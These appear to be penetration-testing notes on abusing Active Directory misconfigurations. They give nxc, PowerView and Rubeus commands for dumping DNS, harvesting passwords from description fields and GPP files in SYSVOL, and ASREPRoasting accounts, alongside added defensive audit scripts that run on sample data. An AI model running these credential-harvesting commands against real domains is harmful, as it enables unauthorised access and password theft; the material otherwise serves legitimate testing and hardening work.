
Misconfigurations Abuse

Enumerating DNS Records

adidnsdump: Active Directory Integrated DNS dumping by any authenticated user

adidnsdump -u rezydev\\jethalal ldap://10.10.10.10
## This generates .csv file.
## -r flag attempts to resolve unknown records by A query

Password in Description Field

## Using PowerView
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

We can also use the NetExec/CrackMapExec user-desc module to hunt for interesting-looking descriptions:

# For ldap we need FQDN
nxc ldap dc01.rezydev.local -u rezydev -p Coolpass123@ -M user-desc

# Note: The module automatically writes every matching description to its log file.

# To find out which keywords the module matches on, locate its source code with find
# and grep for the keyword set
find / -type f -name "user_description.py" 2>/dev/null

# Then cat and grep to find keywords
cat /usr/lib/python3/dist-packages/cme/modules/user_description.py | grep keywords

# Output:
# self.keywords = {'pass', 'creds', 'creden', 'key', 'secret', 'default'}

# We can also use module options to add custom keywords
nxc ldap dc01.rezydev.local -u rezydev -p Coolpass123@ -M user-desc -o KEYWORDS=pwd,admin
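
The following is an added example, not the nxc/CrackMapExec module's own source. It reproduces the idea behind the user-desc module (a case-insensitive keyword match over each account's description, with the default keyword set quoted above plus optional custom keywords) on constructed sample records, so it runs offline. The record layout (dicts with sAMAccountName and description) and the helper names are assumptions for the example.

```python
"""Scan AD user description fields for credential-like keywords (added example)."""

# Default keyword set as quoted from the module source above.
DEFAULT_KEYWORDS = {"pass", "creds", "creden", "key", "secret", "default"}

# Constructed sample records standing in for LDAP search results (not real accounts).
SAMPLE_USERS = [
    {"sAMAccountName": "svc_backup", "description": "Backup service. Password: Summer2024!"},
    {"sAMAccountName": "jethalal", "description": "Sales department, local admin on WS01"},
    {"sAMAccountName": "helpdesk", "description": "Temp creds reset daily"},
    {"sAMAccountName": "printsvc", "description": None},
    {"sAMAccountName": "legacyapp", "description": "Uses DEFAULT login, see KB-1234"},
]


def parse_keyword_option(option):
    """Parse a comma-separated KEYWORDS option (as in -o KEYWORDS=pwd,admin)."""
    return {k.strip().lower() for k in option.split(",") if k.strip()}


def find_suspicious_descriptions(users, extra_keywords=None):
    """Return (account, description, matched_keywords) for every account whose
    description contains any keyword as a case-insensitive substring.
    Accounts with an empty description are skipped."""
    keywords = set(DEFAULT_KEYWORDS) | set(extra_keywords or ())
    hits = []
    for user in users:
        desc = user.get("description")
        if not desc:
            continue
        lowered = desc.lower()
        matched = sorted(k for k in keywords if k in lowered)
        if matched:
            hits.append((user["sAMAccountName"], desc, matched))
    return hits


if __name__ == "__main__":
    # Same scan twice: defaults only, then with the custom keywords from the page.
    for label, extra in (("default keywords", None), ("with pwd,admin", parse_keyword_option("pwd,admin"))):
        print(f"[{label}]")
        for account, desc, matched in find_suspicious_descriptions(SAMPLE_USERS, extra):
            print(f"  {account}: {desc!r} matched {matched}")
```

Substring matching is deliberately loose (it is what makes "creden" catch "credential" and "credentials"), so expect false positives such as "passport" or "keyboard"; the point is to produce a short review list for a defender, who then clears the field or moves the secret out of the directory.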

PASSWD_NOTREQD Field

## Using PowerView
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Group Policy Preferences (GPP) Passwords

ls \\dc01\SYSVOL\REZYDEV.LOCAL\scripts # Credentials in SMB Shares and SYSVOL Scripts

When a Group Policy was created with preferences such as mapped drives or local admin accounts, the passwords were stored in SYSVOL, which every domain user can read. They were encrypted with an AES key that Microsoft itself published, so anyone with domain access could extract and decrypt them with tools like gpp-decrypt to gain elevated access.

gpp-decrypt <CPASSWORD-VALUE>

Locating & Retrieving GPP Password

# Retrieves plaintext passwords and account info from Group Policy Preferences (GPP).
# Groups.xml
nxc smb 10.10.10.10 -u rezydev -p Password123@ -M gpp_password

# Searches for registry.xml on the Domain Controller to extract autologin credentials in plaintext.
# Registry.xml
nxc smb 10.10.10.10 -u rezydev -p Password123@ -M gpp_autologin

# If we get 'NetBIOSTimeout' error, use '--smb-timeout 120'.

# Once found, use nxc/cme to validate if the credentials are still valid.
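
The following is an added example, not part of the original notes and not the source of the nxc gpp_password or gpp_autologin modules. It shows what those modules look for: a non-empty cpassword attribute on a preference item's Properties element, and a Winlogon DefaultPassword value in Registry.xml. The sample documents are constructed (attributes trimmed, placeholder values instead of real ciphertext or passwords) so the scan runs offline; decryption is left to gpp-decrypt as on the page. The file-name list and helper names are assumptions.

```python
"""Audit Group Policy Preference XML under SYSVOL for stored credentials (added example)."""
import os
import xml.etree.ElementTree as ET

# Preference files that can carry a cpassword attribute, plus Registry.xml for autologon.
GPP_XML_NAMES = {
    "groups.xml", "services.xml", "scheduledtasks.xml", "datasources.xml",
    "printers.xml", "drives.xml", "registry.xml",
}

# Constructed sample documents standing in for files under Policies\{GUID}\...\Preferences.
SAMPLE_FILES = {
    "Groups.xml": """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" image="2">
    <Properties action="U" newName="" fullName="" description="Local admin"
                cpassword="EXAMPLE_CPASSWORD_PLACEHOLDER" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
  <User name="Guest" image="2">
    <Properties action="U" newName="" fullName="" description="" cpassword="" userName="Guest"/>
  </User>
</Groups>
""",
    "Registry.xml": """<?xml version="1.0" encoding="utf-8"?>
<RegistrySettings>
  <Registry name="DefaultUserName">
    <Properties action="U" hive="HKEY_LOCAL_MACHINE"
                key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
                name="DefaultUserName" type="REG_SZ" value="autologon"/>
  </Registry>
  <Registry name="DefaultPassword">
    <Properties action="U" hive="HKEY_LOCAL_MACHINE"
                key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
                name="DefaultPassword" type="REG_SZ" value="EXAMPLE_PLAINTEXT_PLACEHOLDER"/>
  </Registry>
</RegistrySettings>
""",
}


def scan_xml_document(name, xml_text):
    """Return a list of findings for one GPP XML document.

    A finding is a dict with file, kind ('cpassword' or 'autologin'), account and value.
    """
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []
    winlogon = {}
    # Properties elements may be nested inside Collection elements, so walk the whole tree.
    for props in root.iter("Properties"):
        cpassword = props.get("cpassword")
        if cpassword:  # attribute present and non-empty: a stored, decryptable password
            account = props.get("userName") or props.get("accountName") or props.get("runAs") or "?"
            findings.append({"file": name, "kind": "cpassword", "account": account, "value": cpassword})
        # Registry preference writing into the Winlogon key: collect name/value pairs.
        if "winlogon" in props.get("key", "").lower() and props.get("value"):
            winlogon[props.get("name", "").lower()] = props.get("value")
    if "defaultpassword" in winlogon:
        findings.append({"file": name, "kind": "autologin",
                         "account": winlogon.get("defaultusername", "?"),
                         "value": winlogon["defaultpassword"]})
    return findings


def scan_samples():
    """Run the scan over the constructed documents above."""
    return [f for name, text in SAMPLE_FILES.items() for f in scan_xml_document(name, text)]


def scan_directory(root_dir):
    """Walk a SYSVOL copy or mount and scan every known preference file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() in GPP_XML_NAMES:
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    try:
                        findings.extend(scan_xml_document(path, fh.read()))
                    except ET.ParseError:
                        pass  # not well-formed XML; skip rather than abort the sweep
    return findings


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f['file']}: {f['kind']} for {f['account']} -> {f['value']}")
```

An empty cpassword (the Guest entry above) is not reported, matching how the modules behave; the remediation for a real hit is to delete the preference item and rotate the account, since the ciphertext in SYSVOL is readable by every domain member.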

ASREPRoasting

ASREPRoasting is an attack targeting Kerberos pre-authentication in Active Directory. If a user does not require pre-authentication, an attacker can request a Ticket Granting Ticket (TGT) and receive an encrypted response. This response can be brute-forced offline using tools like hashcat to recover weak passwords.

We can use PowerView or the built-in Active Directory module to enumerate users with the UAC flag DONT_REQ_PREAUTH set. If a user has GenericWrite or GenericAll permissions over an account, that user can modify its settings to disable pre-authentication and then perform ASREPRoasting against it.

Enumerating for DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
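
Both the PASSWD_NOTREQD check above and the DONT_REQ_PREAUTH check here are bit tests on the userAccountControl attribute, which is what PowerView's -UACFilter and -PreauthNotRequired switches do. The following is an added example (not PowerView code and not from the original notes) that performs the same tests in Python on constructed records, so it runs offline; the record layout and helper names are assumptions, while the bit values come from Microsoft's userAccountControl documentation.

```python
"""Decode userAccountControl and flag risky account settings (added example)."""

# userAccountControl bit values (subset) per Microsoft's documentation.
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}

# Flags this audit reports, with the fix a defender applies.
RISKY = {
    "PASSWD_NOTREQD": "blank password permitted; set a password and clear the flag",
    "DONT_REQ_PREAUTH": "AS-REP roastable; re-enable Kerberos pre-authentication",
}

# Constructed sample records standing in for LDAP results (not real accounts).
SAMPLE_USERS = [
    {"sAMAccountName": "jethalal", "userAccountControl": 0x200},
    {"sAMAccountName": "mmorgan", "userAccountControl": 0x200 | 0x400000},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x200 | 0x20},
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x200 | 0x2 | 0x400000},
    {"sAMAccountName": "kiosk", "userAccountControl": 0x200 | 0x20 | 0x10000 | 0x400000},
]


def decode_uac(value):
    """Return the names of all known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def filter_by_flag(users, flag_name):
    """Python equivalent of Get-DomainUser -UACFilter <flag>: accounts with that bit set."""
    bit = NAME_TO_BIT[flag_name]
    return [u["sAMAccountName"] for u in users if u["userAccountControl"] & bit]


def audit_users(users):
    """Return (account, flag, enabled, remediation) for every risky flag found.

    Disabled accounts are still reported (enabled=False) since they can be re-enabled
    without anyone revisiting the flag.
    """
    out = []
    for u in users:
        uac = u["userAccountControl"]
        enabled = not (uac & NAME_TO_BIT["ACCOUNTDISABLE"])
        for flag, fix in RISKY.items():
            if uac & NAME_TO_BIT[flag]:
                out.append((u["sAMAccountName"], flag, enabled, fix))
    return out


if __name__ == "__main__":
    for u in SAMPLE_USERS:
        print(f"{u['sAMAccountName']:<12} {u['userAccountControl']:>8} {decode_uac(u['userAccountControl'])}")
    for account, flag, enabled, fix in audit_users(SAMPLE_USERS):
        print(f"{account}: {flag} ({'enabled' if enabled else 'disabled'}) -> {fix}")
```

The decoder is the same test PowerView's output column useraccountcontrol already shows; having the bits by name makes it easy to extend RISKY with other flags worth reviewing, such as TRUSTED_FOR_DELEGATION or USE_DES_KEY_ONLY.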

Search for ASREPRoastable Accounts

# Bruteforce Method (No Credentials)
nxc ldap dc01.rezydev.local -u usernames.txt -p '' --asreproast asrepoutput.txt

# Credentialed Method
nxc ldap dc01.rezydev.local -u 'rezydev' -p 'Coolpass123@' --asreproast asrepoutput.txt

# Hashcat Module '18200' to crack the hash.

Retrieve the AS-REP

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Group Policy Object (GPO) Abuse

Enumerate GPOs

# Using PowerView
Get-DomainGPO | select displayname

# LOTL
Get-GPO -All | Select DisplayName

# Domain User GPO Rights
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

# Converting GPO GUID to Name
Get-GPO -Guid <GPO-GUID>

We can also use BloodHound to enumerate GPO rights more easily.